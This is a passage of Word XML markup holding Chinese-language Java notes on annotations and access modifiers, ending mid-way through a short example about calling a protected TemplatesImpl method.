    <w:p w14:paraId="5F896074" w14:textId="77777777" w:rsidR="004D1246" w:rsidRPr="00985DFF" w:rsidRDefault="004D1246" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@SafeVarargs - Java 7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开始支持，忽略任何使用参数为泛型变量的方法或构造函数调用产生的警告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34462D10" w14:textId="77777777" w:rsidR="004D1246" w:rsidRPr="00985DFF" w:rsidRDefault="004D1246" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@FunctionalInterface - Java 8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开始支持，标识一个匿名函数或函数式接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560E72B7" w14:textId="033BA060" w:rsidR="00896896" w:rsidRDefault="004D1246" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">@Repeatable - Java 8 </w:t>
      </w:r>
      <w:r w:rsidRPr="00985DFF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开始支持，标识某注解可以在同一个声明上使用多次。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403AC1F3" w14:textId="292F4E2A" w:rsidR="00896896" w:rsidRDefault="00896896" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D6654C" w14:textId="77777777" w:rsidR="00896896" w:rsidRDefault="00896896" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C9C5EA" w14:textId="47BA6944" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55652593" w14:textId="245F6A5F" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B807C8D" w14:textId="0B37165A" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B61282D" w14:textId="77777777" w:rsidR="001742ED" w:rsidRDefault="001742ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E5A118" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修饰符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861E6DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问控制修饰符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:default public protected private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FD84AA" w14:textId="77777777" w:rsidR="00A250C3" w:rsidRPr="00886B6C" w:rsidRDefault="00A250C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE2A1A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://developer.aliyun.com/article/567484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F3BD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8749E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029D4A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF6F3E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB8B4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4BA871" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6789DBFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> public </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开放，所有用户都可直接调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8F970" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> private </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：私有。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己之外，任何人都不可直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，私有财产神圣不可侵犯嘛，即便是子女，朋友，都不可使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F15FB93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：对于子女、朋友来说，就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，可自由使用，无任何限制；而对于其他的外部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就变成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一个包中的类，若不在同一个包中，必须为其子孙类才可使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396137F4" w14:textId="65C792F4" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、默认</w:t>
      </w:r>
      <w:r w:rsidR="00AE261E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00AE261E">
        <w:t>efault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认可以称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>friendly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中是没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>friendly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个修饰符的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样称呼应该是来源于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中关于成员变量访问权限问题一般书中会给出如下表格：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC67BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="69A156CD" wp14:editId="6D8BEF8E">
            <wp:extent cx="5410200" cy="1152525"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="2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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5410200" cy="1152525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E142D7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私默保公，类包子任</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721722B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一个包即同一个目录中的类访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FDAAB5" w14:textId="77777777" w:rsidR="00AE261E" w:rsidRDefault="00AE261E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619EE423" w14:textId="77777777" w:rsidR="00AE261E" w:rsidRDefault="00AE261E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53131979" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC518E4" w14:textId="6C64C261" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问修饰符描述之二</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A58A5D1" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DE053E" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问修饰符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>ccess modifiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）用于控制类、方法、变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的可见性和访问级别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BC57C" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7453F518" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同的类和包之间都是可见的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE8BC2" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>rotected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受保护的修饰符。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5EB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同包可见，其他包子类可见。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01747D01" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：默认修饰符，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A47E48">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同包可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其他包中的子类不可见。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEC3593" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：私有访问修饰符，修饰的方法、变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5EB8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>类内部</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问，其他类无法直接访问，有助于封装和隐藏类的实现细节。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD03AAB" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6797A7" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>emplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>etTransletName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，但是像下面这样用是错误的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703199DD" w14:textId="77777777" w:rsidR="00AD0F93" w:rsidRDefault="00AD0F93" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">TemplatesImpl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">obj = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D0A8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TemplatesImpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>obj.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setTransletName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
